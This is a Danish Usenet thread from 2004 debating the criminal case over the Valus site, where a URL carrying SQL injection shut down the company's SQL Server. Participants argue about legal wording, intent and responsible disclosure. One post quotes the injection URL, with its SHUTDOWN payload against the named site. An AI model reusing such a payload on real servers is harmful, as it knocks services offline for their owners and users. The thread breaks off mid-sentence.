> direkte på serveren(e). MS Sql server (som Valus anvender) giver faktisk
> adgang til at udføre shell kommandoer.

Enig. Men har det nogen betydning for, hvordan der skal
dømmes i den konkrete sag?

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

Kim Ludvigsen wrote:
>
> Kasper Dupont wrote:
> >
> > Normalt ville jeg ikke hænge mig så meget i om man kaldte
> > det requests eller kommandoer. Men i et anklageskrift kan
> > man altså ikke være så lemfældig med detaljerne.
>
> Måske der også er forskel på, hvad man i edb-verdenen kalder en
> kommando, og hvad man andre steder kalder en kommando. Jeg mener i hvert
> fald, at det godt kan forsvares at kalde det at sende en kommando, idet
> man beder serveren om at udføre en bestemt handling. Men måske den
> diskussion hører mere hjemme i sproggruppen.

Kommunikationen mellem browseren og serveren er defineret
i RFC 2616. Ifølge min ordbog er det engelske ord for
kommando command eller i enkelte specielle tilfælde order.
Ordet command bliver overhovedet ikke brugt i RFC 2616.
Ordet order bliver brugt men kun i betydningen rækkefølge
og i sammensætningen "in order to", der betyder "for at".
Der er altså ingen tvivl om, at der ikke er noget, der
hedder kommandoer i HTTP protokollen. Og kommando er
derfor et forkert ordvalg.

>
> Noget helt andet er så, om man har valgt en forkert paragrat eller ej.
> Vi nærmer os her en anden diskussion i juragruppen, om hvad der ligger i
> ordet uberettiget (Fildeling på LAN).

Jeg mener ikke det i Valus sagen har været behov for at
diskutere hvad uberettiget betyder. Det har til gengæld
været diskuteret, hvad adgang betyder.

>
> Måske man skulle skele til, hvordan sagen mod en af de andre, der
> kopierede den pågældende URL endte:
> http://www.computerworld.dk/default.asp?Mode=2&ArticleID=16916.
> Det skal dog bemærkes, at sagerne ikke er helt ens. I den afgjorte sag
> lykkedes det ikke at lukke serveren, fordi Cubus kom ham i forkøbet, til
> gengæld forsøgte han sig også med Computerworld Onlines server, hvor han
> slettede et brugerkartotek efter at have gættet på tabelnavne i en
> database.

Det er jo egentlig utroligt at Computerworld ikke
forbedrede deres sikkerhed efter den hændelse. Men jeg
må så også konstatere, at det udfra den forklaring er en
væsentligt værre handling han har begået. Jeg mener i
hvert fald det må være værre at slette data fra serveren
end at blot lukke den ned. Hvade Cubus ikke kommet ham i
forkøbet og lukket Valus database server ned, så var det
måske på Valus, der var blevet slettet data fra databasen.

> Artiklen skriver desværre ikke, hvilken paragraf, han blev
> dømt efter, men mon ikke anklageren har benyttet den samme paragraf til
> de to sager.

Cubus har jo ikke slettet nogen data fra databasen. Så
der er i hvert fald en mulighed mere for at tiltale ham.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

Kasper Dupont wrote:
>
> Kim Ludvigsen wrote:
>
> > Måske der også er forskel på, hvad man i edb-verdenen kalder en
> > kommando, og hvad man andre steder kalder en kommando.
>
> Kommunikationen mellem browseren og serveren er defineret
> i RFC 2616. Ifølge min ordbog er det engelske ord for
> kommando command eller i enkelte specielle tilfælde order.

Jeg er ikke i tvivl om, hvad der er den rette tekniske betegnelse. Jeg
skriver om, at der måske er forskel på at kalde det en kommando i et
teknisk sprog og at kalde det en kommando i et anklageskrift eller for
den sags skyld i daglig tale. Ligesom vi normalt kalder geologiske
fragmenter for sten.

> > Noget helt andet er så, om man har valgt en forkert paragrat eller ej.
> > Vi nærmer os her en anden diskussion i juragruppen, om hvad der ligger i
> > ordet uberettiget (Fildeling på LAN).
>
> Jeg mener ikke det i Valus sagen har været behov for at
> diskutere hvad uberettiget betyder. Det har til gengæld
> været diskuteret, hvad adgang betyder.

Paragfraffen lyder:
Stk. 2. Med bøde eller fængsel indtil 6 måneder straffes den, som
uberettiget skaffer sig adgang til en andens oplysninger eller
programmer, der er bestemt til at bruges i et anlæg til elektronisk
databehandling.

Der er vist ingen tvivl om, at han har skaffet sig adgang til en andens
program, der bruges i et anlæg til elektronisk databehandling.
Spørgsmålet må være, om han har gjort det uberettiget.

--
Mvh. Kim Ludvigsen

---

Kim Ludvigsen wrote:
>
> Der er vist ingen tvivl om, at han har skaffet sig adgang til en andens
> program, der bruges i et anlæg til elektronisk databehandling.
> Spørgsmålet må være, om han har gjort det uberettiget.

Hvilket program? Han har sendt en request til webserveren,
som starter et script, som sender en forespørgsel til
databaseserveren. Og denne sekvens af hændelser er
nøjagtigt de samme som hvis man blot kiggede på deres
websider. Der er altså intet uberettiget i den adgang du
har til programmerne gennem førnævnte forbindelser.

Men denne adgang kunne altså bruges til at udføre andre
handlinger end de tiltænkte. Jeg mener der må være tale
om at udføre en uberettiget handling med den adgang man
er blevet tildelt.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

Kasper Dupont <abuse@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> writes:

>Men denne adgang kunne altså bruges til at udføre andre
>handlinger end de tiltænkte. Jeg mener der må være tale
>om at udføre en uberettiget handling med den adgang man
>er blevet tildelt.

Hvis man får at vide, at man ikke må smide sten gennem vinduer, er
det så okay at smide metalklodser i stedet? (Husk på at jura ikke
kun handler om det, der står i lovteksten. Det handler næsten lige
så meget om tankerne med både selve lovteksten og personens handling)

Det bliver ganske interessant at se, hvad sagen ender med. Den kan
skabe en spændende præcedens uanset hvilken vej, den hælder.

Mvh.
   Klaus.

---

Klaus Ellegaard skrev:

>Hvis man får at vide, at man ikke må smide sten gennem vinduer, er
>det så okay at smide metalklodser i stedet?

Sammenligninger forvirrer mere end de gavner.

Jeg tror (!) at Valushackeren kan straffes, men jeg tror ikke at
hankan straffes for det han er anklaget for (nemlig at skaffe sig
adgang).

Men jeg vil svært gerne have at vide hvilken paragraf han har
overtrådt. Jeg kan nemlig ikke selv finde en der dækker. En hel
del af paragrafferne i straffeloven som man kunne overveje, har
nemlig en passus med "for at skaffe sig eller andre uberettiget
vinding", og det er ikke tilfældet her

>(Husk på at jura ikke kun handler om det, der står i lovteksten. Det handler næsten lige
>så meget om tankerne med både selve lovteksten og personens handling)

Og hvis personens tanker var "Det kan simpelt hen ikke passe
....". Hvad så?

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

Bertel Lund Hansen <nospamius@lundhansen.dk> writes:

>>(Husk på at jura ikke kun handler om det, der står i lovteksten. Det
>>handler næsten lige så meget om tankerne med både selve lovteksten og
>>personens handling)

>Og hvis personens tanker var "Det kan simpelt hen ikke passe
>...". Hvad så?

Så kan det _måske_ retfærdiggøre, at man prøver én gang, hvis man
straks og med det samme kontakter firmaet bag og fortæller, at man
har gjort det.

Så vidt jeg kan forstå, er sitet blevet lagt ned mange gange af
samme person. Og vedkommende har ikke informeret firmaet bag.

Mvh.
   Klaus.

---

Klaus Ellegaard skrev:

>Så vidt jeg kan forstå, er sitet blevet lagt ned mange gange af
>samme person.

Nej. Det blev lagt ned første gang, og så forsøgte han (vist fem
gange) næste dag uden held. Hullet var blevet lukket.

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

Bertel Lund Hansen <nospamius@lundhansen.dk> writes:

>>Så vidt jeg kan forstå, er sitet blevet lagt ned mange gange af
>>samme person.

>Nej. Det blev lagt ned første gang, og så forsøgte han (vist fem
>gange) næste dag uden held. Hullet var blevet lukket.

....hvilket jo også umiddelbart tyder på en ond hensigt? Ikke sagt
at det var det. Men hvad skulle grunden være til at forsøge flere
gange at få systemet i knæ?

Mvh.
   Klaus.

---

Den Sun, 6 Jun 2004 11:47:19 +0000 (UTC) skrev Klaus Ellegaard:
> Bertel Lund Hansen <nospamius@lundhansen.dk> writes:
>
>>>Så vidt jeg kan forstå, er sitet blevet lagt ned mange gange af
>>>samme person.
>
>>Nej. Det blev lagt ned første gang, og så forsøgte han (vist fem
>>gange) næste dag uden held. Hullet var blevet lukket.
>
> ...hvilket jo også umiddelbart tyder på en ond hensigt? Ikke sagt
> at det var det. Men hvad skulle grunden være til at forsøge flere
> gange at få systemet i knæ?

Hvis vi holder fast i "Det kan ikke passe"-teorien, så vil det da være
den naturlige reaktion. Man trykker på noget (i dette tilfælde et link),
og så holder noget andet op med at virke. Det kunne godt se ud som om
der er en sammenhæng, men det kan ikke passe.

Hvad gør man så? Kontakter et firma og fortæller: "Jeg tror ikke på at
i har et sikkerhedshul, men det ser lidt sådan ud"? Det er muligt at
det er det rigtige at gøre i den situation, men man vil sg* føle sig
lidt til grin.

Nej, den naturlige reaktion vil være at prøve igen. Da sitet jo var
nede, er man nødt til at vente til næste dag. Så prøver man igen, og
der sker ikke noget. "Hvad sagde jeg, det kunne ikke passe." Prøver
igen, der sker ikke noget. "Det har nok bare været et tilfælde at det
holdt op med at virke lige som jeg clickede på linket". Man prøver lige
et par gange mere for at være helt sikker på at det ikke var derfor
at sitet holdt op med at virke.

Mvh
Kent
--
Help test this great MMORPG game - http://www.eternal-lands.com/

---

Kent Friis <nospam@nospam.invalid> writes:

>Hvis vi holder fast i "Det kan ikke passe"-teorien, så vil det da være
>den naturlige reaktion. Man trykker på noget (i dette tilfælde et link),
>og så holder noget andet op med at virke. Det kunne godt se ud som om
>der er en sammenhæng, men det kan ikke passe.

>Hvad gør man så? Kontakter et firma og fortæller: "Jeg tror ikke på at
>i har et sikkerhedshul, men det ser lidt sådan ud"?

Det er jo ikke helt sådan, den startede.

Den startede med, at informationen blev spredt via computerworld.dk.
Altså har vi allerede en konstatering af, at hullet er der. Når man
så prøver hullet af, og sitet derefter går ned, er der nok meget lidt
tvivl om, at man er skyld i nedbruddet.

(Ikke skyld i at sitet KAN gå ned - men der er vel ikke nogen tvivl
om, at man er skyld i, at det på dette specifikke tidspunkt gik ned)

Og så ville det da være på sin plads at informere virksomheden om det.
Om ikke andet med et link til siden på Computer World og information
om, at man har gjort det.

Mvh.
   Klaus.

---

Den Sun, 6 Jun 2004 12:10:16 +0000 (UTC) skrev Klaus Ellegaard:
> Kent Friis <nospam@nospam.invalid> writes:
>
>>Hvis vi holder fast i "Det kan ikke passe"-teorien, så vil det da være
>>den naturlige reaktion. Man trykker på noget (i dette tilfælde et link),
>>og så holder noget andet op med at virke. Det kunne godt se ud som om
>>der er en sammenhæng, men det kan ikke passe.
>
>>Hvad gør man så? Kontakter et firma og fortæller: "Jeg tror ikke på at
>>i har et sikkerhedshul, men det ser lidt sådan ud"?
>
> Det er jo ikke helt sådan, den startede.
>
> Den startede med, at informationen blev spredt via computerworld.dk.
> Altså har vi allerede en konstatering af, at hullet er der.

Tror du på alt hvad du læser på computerworld? Også når det er i
kategorien "Det kan ikke passe"?

> Når man
> så prøver hullet af, og sitet derefter går ned, er der nok meget lidt
> tvivl om, at man er skyld i nedbruddet.

Det kommer an på hvordan personen tænker. Hvis man ikke ved noget om
sql injection exploits, kan det sagtens virke så usandsynligt at man
simpelthen ikke tror på det.

> (Ikke skyld i at sitet KAN gå ned - men der er vel ikke nogen tvivl
> om, at man er skyld i, at det på dette specifikke tidspunkt gik ned)

Eller det var nede i forvejen. Historien melder ikke noget om hvorvidt
Cubus havde testet at valus rent faktisk virkede INDEN han clickede på
linket.

Jeg har da før clicket på links hvor det har vist sig at sitet var nede.
Jeg tror da ikke af den grund at det er fordi jeg clickede på linket at
det er nede, det har sikkert været nede i timevis, og kommer ikke op
igen før mandag morgen, når folk møder på arbejde.

> Og så ville det da være på sin plads at informere virksomheden om det.
> Om ikke andet med et link til siden på Computer World og information
> om, at man har gjort det.

Som sagt, hvis man ikke selv tror på at det var derfor, føler man sig
ret tåbelig ved at fortælle folk det.

Mvh
Kent
--
Help test this great MMORPG game - http://www.eternal-lands.com/

---

Kent Friis <nospam@nospam.invalid> writes:

>Som sagt, hvis man ikke selv tror på at det var derfor, føler man sig
>ret tåbelig ved at fortælle folk det.

Hvordan er den følelse i forhold til en plettet straffeattest?

Igen: jeg snakker ikke om det konkrete tilfælde her - blot helt
generelt om, hvad man kan gøre, hvis man kommer ud for den samme
situation.

Mvh.
   Klaus.

---

Den Sun, 6 Jun 2004 13:04:10 +0000 (UTC) skrev Klaus Ellegaard:
> Kent Friis <nospam@nospam.invalid> writes:
>
>>Som sagt, hvis man ikke selv tror på at det var derfor, føler man sig
>>ret tåbelig ved at fortælle folk det.
>
> Hvordan er den følelse i forhold til en plettet straffeattest?

Hvis det skal føles tåbeligt at overholde loven, så er det måske loven
der er noget galt med?

For flertallet der ikke læser hver eneste paragraf, men bare opfører
sig furnuftigt, vil det da komme som en stor overraskelse hvis de fandt
ud af at alm sund fornuft giver en plettet straffeattest.

Mvh
Kent
--
Help test this great MMORPG game - http://www.eternal-lands.com/

---

Kent Friis wrote:
>
> For flertallet der ikke læser hver eneste paragraf, men bare opfører
> sig furnuftigt, vil det da komme som en stor overraskelse hvis de fandt
> ud af at alm sund fornuft giver en plettet straffeattest.

Hvis man læser et sted "hvis du gør X, går Y's udstyr/forretning i
stykker", så vil jeg mene man er ufornuftig, og ikke handler i god tro,
hvis man gør X.

--
Don't waste space

---

Den Sun, 6 Jun 2004 13:31:55 +0000 (UTC) skrev Thomas Corell:
> Kent Friis wrote:
>>
>> For flertallet der ikke læser hver eneste paragraf, men bare opfører
>> sig furnuftigt, vil det da komme som en stor overraskelse hvis de fandt
>> ud af at alm sund fornuft giver en plettet straffeattest.
>
> Hvis man læser et sted "hvis du gør X, går Y's udstyr/forretning i
> stykker", så vil jeg mene man er ufornuftig, og ikke handler i god tro,
> hvis man gør X.

Hvis du fløjter, eksploderer statsministerens ministerbil.

Er du nu i ond tro, hvis du fløjter?

Mvh
Kent
--
Help test this great MMORPG game - http://www.eternal-lands.com/

---

Kent Friis <nospam@nospam.invalid> writes:

>Hvis du fløjter, eksploderer statsministerens ministerbil.

>Er du nu i ond tro, hvis du fløjter?

Hvor er relevansen i forhold til "http://blah/SHUTDOWN"?

Det er da nærmere, "Her er en bombe. Hvis du smider den ind
i statsministerens bil, eksploderer den".

Mvh.
   Klaus.

---

Den Sun, 6 Jun 2004 14:11:00 +0000 (UTC) skrev Klaus Ellegaard:
> Kent Friis <nospam@nospam.invalid> writes:
>
>>Hvis du fløjter, eksploderer statsministerens ministerbil.
>
>>Er du nu i ond tro, hvis du fløjter?
>
> Hvor er relevansen i forhold til "http://blah/SHUTDOWN"?

At for folk der ikke ved noget om SQL injection, lyder det totalt
usandsynligt at man skulle kunne lukke en server ned ved at clicke
på en link. Når en sådan person læser det, vil han/hun tænke "det
kan simpelthen ikke passe".

> Det er da nærmere, "Her er en bombe. Hvis du smider den ind
> i statsministerens bil, eksploderer den".

Hvem tænker "det kan simpelthen ikke passe" om en bombe?

Mvh
Kent
--
Help test this great MMORPG game - http://www.eternal-lands.com/

---

Kent Friis wrote:
>
> At for folk der ikke ved noget om SQL injection, lyder det totalt
> usandsynligt at man skulle kunne lukke en server ned ved at clicke
> på en link. Når en sådan person læser det, vil han/hun tænke "det
> kan simpelthen ikke passe".

Så er man vist også dummere end loven tillader. URL'en stod i en
debattråd
(http://debat.computerworld.dk/thread.asp?Mode=View&threadID=3700), hvor
der blev påpeget flere sikkerhedshuller. En Valus-medarbejder deltager
endda og erkender den ene fejl. Så når man når frem til indlægget med
den pågældende URL, må man være klar over, at det ikke er usandsynligt
med fejl i systemet. I det pågældende indlæg står der tilmed:

"F.eks kunne man vel nok banke SQL Serveren ned med:
http://www.valus.dk/publisering/default.asp?Cid=3%01SHUTDOWN
(Lad være med at klikke - det er jo næsten for let)."

> > Det er da nærmere, "Her er en bombe. Hvis du smider den ind
> > i statsministerens bil, eksploderer den".
>
> Hvem tænker "det kan simpelthen ikke passe" om en bombe?

Hvis man trods flere advarsler mener, det er usandsynligt, at man kan
lukke en server ved at kopiere en URL, er man sikkert også dum nok til
at tro, at det bare er en attrap.

FUT: news:dk.edb.sikkerhed

--
Mvh. Kim Ludvigsen

---

Kim Ludvigsen wrote:
>
> Kent Friis wrote:
> >
> > At for folk der ikke ved noget om SQL injection, lyder det totalt
> > usandsynligt at man skulle kunne lukke en server ned ved at clicke
> > på en link. Når en sådan person læser det, vil han/hun tænke "det
> > kan simpelthen ikke passe".
>
> Så er man vist også dummere end loven tillader.

Sætter loven nogen begrænsning på, hvor dum man må være?

FUT: dk.videnskab.jura

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

Kasper Dupont skrev:

>Sætter loven nogen begrænsning på, hvor dum man må være?

Ja. Der er flere steder en passus a la "vidste eller burde vide".
Derudover kræver den kendskab til loven. Hvis man kender den, er
man ikke helt dum. Det tror jeg nok at juristerne er enige med
mig i.

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

Bertel Lund Hansen wrote:
>
> Derudover kræver den kendskab til loven. Hvis man kender den, er
> man ikke helt dum. Det tror jeg nok at juristerne er enige med
> mig i.

Det vil altså sige, at 90% af Danmarks befolkning er
dummere end loven tillader?

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

"Kasper Dupont" <abuse@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> skrev i
en meddelelse
news:40C35DB3.114DB556@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk...
> Bertel Lund Hansen wrote:
> >
> > Derudover kræver den kendskab til loven. Hvis man kender den, er
> > man ikke helt dum. Det tror jeg nok at juristerne er enige med
> > mig i.
>
> Det vil altså sige, at 90% af Danmarks befolkning er
> dummere end loven tillader?

Det sætter ligesom en vis filmtittel i et andet perspektiv:
Dumme end politiet tillader

Sorry - men kunne ikke helt dy mig for at smutte lidt OT - det var ganske
enkelt *for* oplagt.

--
MVH Anders (8900)
Det er fordi det er nemmere at læse - vi læser jo ikke nedfra og op.
Hvorfor skal man skrve svaret under det man svarer ?
..

---

> Hvor er relevansen i forhold til "http://blah/SHUTDOWN"?
>
> Det er da nærmere, "Her er en bombe. Hvis du smider den ind
> i statsministerens bil, eksploderer den".

http protokollen er lavet til at hente dokumenter. Det er en meget
simpel protokol med en anmodning og et svar.

Med

http://blah/SHUTDOWN

Kan man forvente at modtage et dokument der beskriver emnet "shutdown" -
ikke at en bank vil lukke sin database.

---

No1 <nospamplz@removeentireaddress.mars> writes:

>http protokollen er lavet til at hente dokumenter. Det er en meget
>simpel protokol med en anmodning og et svar.

Du mener i fulde alvor, at netbanker, onlinebutikker og slige sager
slet ikke findes?

Mvh.
   Klaus.

---

>>http protokollen er lavet til at hente dokumenter. Det er en meget
>>simpel protokol med en anmodning og et svar.
>
>
> Du mener i fulde alvor, at netbanker, onlinebutikker og slige sager
> slet ikke findes?

Nej, hvor har du det fra? Jeg siger bare hvad HTTP-protokollen er lavet til.

Når folk indtaster en URL, gør det for at få vist en webside. Det kan
man forvente og det er også det WWW er lavet til.

---

"No1" wrote

> Nej, hvor har du det fra? Jeg siger bare hvad HTTP-protokollen er
lavet til.
>
> Når folk indtaster en URL, gør det for at få vist en webside. Det kan
> man forvente og det er også det WWW er lavet til.

Øhh, det var den ene del af det - dvs hente data...
Hvad med at sende data?

- Peter

---

No1 <nospamplz@removeentireaddress.mars> writes:

>>>http protokollen er lavet til at hente dokumenter. Det er en meget
>>>simpel protokol med en anmodning og et svar.
>>
>> Du mener i fulde alvor, at netbanker, onlinebutikker og slige sager
>> slet ikke findes?

>Nej, hvor har du det fra? Jeg siger bare hvad HTTP-protokollen er lavet til.

Et dokument er som udgangspunkt en statisk størrelse. Hvis der
er funktionalitet bag, kan det vel ikke overraske, at man også
kan lave funktionalitet, der lukker en tjeneste ned?

Forskellen på at lave et databaseopslag og at lukke databasen
ned, er rent teknisk lig nul. Ergo er det i praksis en meget
naiv holdning at sige/tro, at HTTP kun serverer dokumenter.

Mvh.
   Klaus.

---

> Et dokument er som udgangspunkt en statisk størrelse. Hvis der
> er funktionalitet bag, kan det vel ikke overraske, at man også
> kan lave funktionalitet, der lukker en tjeneste ned?
>
> Forskellen på at lave et databaseopslag og at lukke databasen
> ned, er rent teknisk lig nul. Ergo er det i praksis en meget
> naiv holdning at sige/tro, at HTTP kun serverer dokumenter.

Pointen er, at det er det folk er vant til. Når folk skriver en URL ind
i adressefeltet forventer de at de kommer hen til en bestemt webside.
Hvis man skriver hotmail.com, kommmer man til hotmails side. Folk
forventer ikke at de kan sende breve eller lave data-modificerende
handlinger ved at indtaste ting i databasen.

Det sker normalt ved at man udfylder formularer og trykker på knapper,
så man fx overfører penge med netbank eller sender et brev. Det sker
normalt ikke ved at skrive noget i adressefeltet.

Jeg ved godt at man kan gøre en masse ting ved at skrive URL's ind i
adressefeltet, jeg programmerer selv websoftware.

---

No1 skrev:

>Pointen er, at det er det folk er vant til. Når folk skriver en URL ind
>i adressefeltet forventer de at de kommer hen til en bestemt webside.

Hvis man f.eks. har brugt Googles newsgroup search og vil
videregive linket, så er der god grund til at rode med
parametrene i URL'en. Ligeså hvis man vil lægge et link ind til
Eniros kort til der hvor man f.eks. selv bor, så kan man korte
URL'en drastisk ned ved at eksperimentere med hvlke parametre der
er nødvendige.

--
Bertel
http://bertel.lundhansen.dk/   FIDUSO: http://fiduso.dk/

---

Kent Friis wrote:
>
> Hvis du fløjter, eksploderer statsministerens ministerbil.
>
> Er du nu i ond tro, hvis du fløjter?

Hvis jeg ikke er kompetent til at vurdere om det er farligt at fløjte,
så strider det imod min sunde fornuft at forsøge. Jeg vil ihvertfald
ikke handle i god tro.

--
Don't waste space

---

"Klaus Ellegaard" <klausellegaard@msn.com> skrev

> Den startede med, at informationen blev spredt via computerworld.dk.
> Altså har vi allerede en konstatering af, at hullet er der. Når man
> så prøver hullet af, og sitet derefter går ned, er der nok meget lidt
> tvivl om, at man er skyld i nedbruddet.
>
> (Ikke skyld i at sitet KAN gå ned - men der er vel ikke nogen tvivl
> om, at man er skyld i, at det på dette specifikke tidspunkt gik ned)

Det kunne såmænd lige så godt være en fejl i Internet Explorer, som
gjorde sitet utilgængeligt. At browseren ikke kunne kapere den
pågældende tekststreng. At et firma, der påtager sig at administrere folks
penge, skulle lukke ned fordi der skrives luk ned i webadressen er
usandsynligt. Skulle der være en knas med Explorer er det vist ikke
første gang.

--
Cubus
http://cubus-adsl.dk/

---

In <qnEwc.264$Bn5.100@news.get2net.dk> "Cubus" <cubus@sol.dk> writes:

>"Klaus Ellegaard" <klausellegaard@msn.com> skrev

>> Den startede med, at informationen blev spredt via computerworld.dk.
>> Altså har vi allerede en konstatering af, at hullet er der. Når man
>> så prøver hullet af, og sitet derefter går ned, er der nok meget lidt
>> tvivl om, at man er skyld i nedbruddet.
>>
>> (Ikke skyld i at sitet KAN gå ned - men der er vel ikke nogen tvivl
>> om, at man er skyld i, at det på dette specifikke tidspunkt gik ned)

>Det kunne såmænd lige så godt være en fejl i Internet Explorer, som
>gjorde sitet utilgængeligt. At browseren ikke kunne kapere den
>pågældende tekststreng. At et firma, der påtager sig at administrere folks
>penge, skulle lukke ned fordi der skrives luk ned i webadressen er
>usandsynligt. Skulle der være en knas med Explorer er det vist ikke
>første gang.

Er det rigtigt at du proevede fem gange med en shutdown request/kommando ?

/Martin

---

"Klaus Ellegaard" <klausellegaard@msn.com> skrev

> Så vidt jeg kan forstå, er sitet blevet lagt ned mange gange af
> samme person. Og vedkommende har ikke informeret firmaet bag.

Foretagenet er mig komplet ligegyldigt. En mærkværdig tanke at
man skulle bruge sin kostbare tid på at lege barnepige for
uvedkommende firmaer.

Ifølge denne artikel blev Valus "angrebet" flere 100.000 gange
over nogle dage

http://www.digi.no/digi98.nsf/pub/dd20021114121944_hb_68765392

--
Cubus
http://cubus-adsl.dk/

---

Cubus uttered:
> Ifølge denne artikel blev Valus "angrebet" flere 100.000 gange
> over nogle dage
>
> http://www.digi.no/digi98.nsf/pub/dd20021114121944_hb_68765392

Oh ho ho:

"Det var to små sikkerhetshull på Valus i begynnelsen som vi tettet med
en gang, hevder Evensen."

Jeg vil nødig se de store huller der evt. måtte være i deres systemer...

\\kristian
--
"The brain is a wonderful organ. It starts working the moment you get
up in the morning and does not stop until you get into the office."
--Robert Frost

---

"Cubus" <cubus@sol.dk> writes:

>> Så vidt jeg kan forstå, er sitet blevet lagt ned mange gange af
>> samme person. Og vedkommende har ikke informeret firmaet bag.

>Foretagenet er mig komplet ligegyldigt. En mærkværdig tanke at
>man skulle bruge sin kostbare tid på at lege barnepige for
>uvedkommende firmaer.

Hvis du havde kontaktet dem, var de nok blevet lidt utilfredse, men
så var sagen sluttet dér.

Nu har du i stedet spildt en enorm mængde tid på politi og retssag.

Så det første ville nok være at foretrække, selvom jeg godt kan se,
at det næppe er det, man tænker på at gøre i situationen.

Mvh.
   Klaus.

---

Klaus Ellegaard wrote:
>
> Hvis du havde kontaktet dem, var de nok blevet lidt utilfredse, men
> så var sagen sluttet dér.

Det skal du ikke være så sikker på. Her er det svar jeg
fik fra et unavngivent dansk website, da jeg spurgte til
et hul, jeg havde gjort dem opmærksomme på seks uger
tidligere:

Du må meget undskylde Kasper, men hvis du passer
dit så passer vi vores. Jeg har RIGTIGT mange
tinge at se til - så hver ting til sin tid.

Fire måneder senere stod hullet stadig åbent!

Et andet site hvor jeg fandt et hul sendte jeg blot en
enkelt email til. Det er ca. et år siden, og jeg har
ikke fået noget svar endnu.

Hvis man i øvrigt er interesseret i en mindre undersøgelse
af, hvordan virksomheder reagerer på sådan en henvendelse,
så se på den her side:

http://snakeoil.dk/kommentarer/20021127-2

Ud af syv virksomheder, der fik en venlig henvendelse, var
der én virksomhed, der blot sagde tak og lukkede hullet.

(Med mindre nogen er vildt interesserede, så vil jeg
forskåne jer for min holdning til, hvordan en virksomhed
bør reagere på henvendelsen.)

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

On 2004-06-06, Kasper Dupont <abuse@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> wrote:
>>
>> Hvis du havde kontaktet dem, var de nok blevet lidt utilfredse, men
>> så var sagen sluttet dér.
>
> Det skal du ikke være så sikker på. Her er det svar jeg
> fik fra et unavngivent dansk website, da jeg spurgte til
> et hul, jeg havde gjort dem opmærksomme på seks uger
> tidligere:

Orv, det var da et hurtigt svar. Et større dansk website valgte at
ignorere mig i et års tid (på trods af at jeg kontaktede tre forskellige
personer ved tre forskellige lejligheder). Først da datatilsynet var
inde over sagen valgte de at fixe problemet...dog først 3-4 måneder
efter. Jeg har fortsat ikke hørt fra andre end datatilsynet i den sag.

--
Andreas Plesner Jacobsen | Owe no man any thing...
|    -- Romans 13:8

---

Andreas Plesner Jacobsen wrote:
>
> On 2004-06-06, Kasper Dupont <abuse@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> wrote:
> >>
> >> Hvis du havde kontaktet dem, var de nok blevet lidt utilfredse, men
> >> så var sagen sluttet dér.
> >
> > Det skal du ikke være så sikker på. Her er det svar jeg
> > fik fra et unavngivent dansk website, da jeg spurgte til
> > et hul, jeg havde gjort dem opmærksomme på seks uger
> > tidligere:
>
> Orv, det var da et hurtigt svar.

Det skal så siges, at jeg inden da havde henvendt mig
tre gange. Første gang blev min henvendelse fuldstændigt
ignoreret. Fem uger senere prøvede jeg igen og de lovede
at gøre noget ved hullet. En uge senere spurgte jeg om
hvornår de havde tænkt sig at gøre noget ved hullet, og
fik så at vide, at de ikke havde tid til det.

--
Kasper Dupont -- der bruger for meget tid paa usenet.
For sending spam use kasperd@kd.lir.dk and abuse@kd.lir.dk
I'd rather be a hammer than a nail.

---

In <40C31471.FCA80AE6@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> Kasper Dupont <abuse@wfbtxutyalwrmianeanaimlqcc.skrammel.yaboo.dk> writes:

>Klaus Ellegaard wrote:
>>
>> Hvis du havde kontaktet dem, var de nok blevet lidt utilfredse, men
>> så var sagen sluttet dér.

>Det skal du ikke være så sikker på. Her er det svar jeg
>fik fra et unavngivent dansk website, da jeg spurgte til
>et hul, jeg havde gjort dem opmærksomme på seks uger
>tidligere:

> Du må meget undskylde Kasper, men hvis du passer
> dit så passer vi vores. Jeg har RIGTIGT mange
> tinge at se til - så hver ting til sin tid.

>Fire måneder senere stod hullet stadig åbent!

>Et andet site hvor jeg fandt et hul sendte jeg blot en
>enkelt email til. Det er ca. et år siden, og jeg har
>ikke fået noget svar endnu.

>Hvis man i øvrigt er interesseret i en mindre undersøgelse
>af, hvordan virksomheder reagerer på sådan en henvendelse,
>så se på den her side:

>http://snakeoil.dk/kommentarer/20021127-2

>Ud af syv virksomheder, der fik en venlig henvendelse, var
>der én virksomhed, der blot sagde tak og lukkede hullet.

Vel, Det var ikke syv virksomheder, hvor der sikkert var et hul, men
kun syv hvor der kunne vaere et hul. Maaske har de sidste seks undersoegte
at der netop ikke var hul og ikke svaret tilbage.

/Martin

---

Klaus Ellegaard wrote:
>
> Så vidt jeg kan forstå, er sitet blevet lagt ned mange gange af
> samme person. Og vedkommende har ikke informeret firmaet bag.

Så vidt jeg har forstået blev serveren lukket ned to gange
af to forskellige personer. Efter den første gang valgte
Valus tilsyneladende blot at starte den op igen uden at
undersøge, hvorfor den var lukket ned. Vel vidende, at der
på det tidspunkt var en tråd i Computerworlds debatforum,
hvor netop sikkerheden af Valus system blev diskuteret.

Først efter serveren blev lukket ned anden gang gjorde man
noget for at finde årsagen og lukke hullet. Herefter har
der været mange mislykkede forsøg på at bruge URLen. Og
den famøse URL vil i øvrigt blive sendt til Valus server
igen og igen i fremtiden, fordi den på nuværende tidspunkt
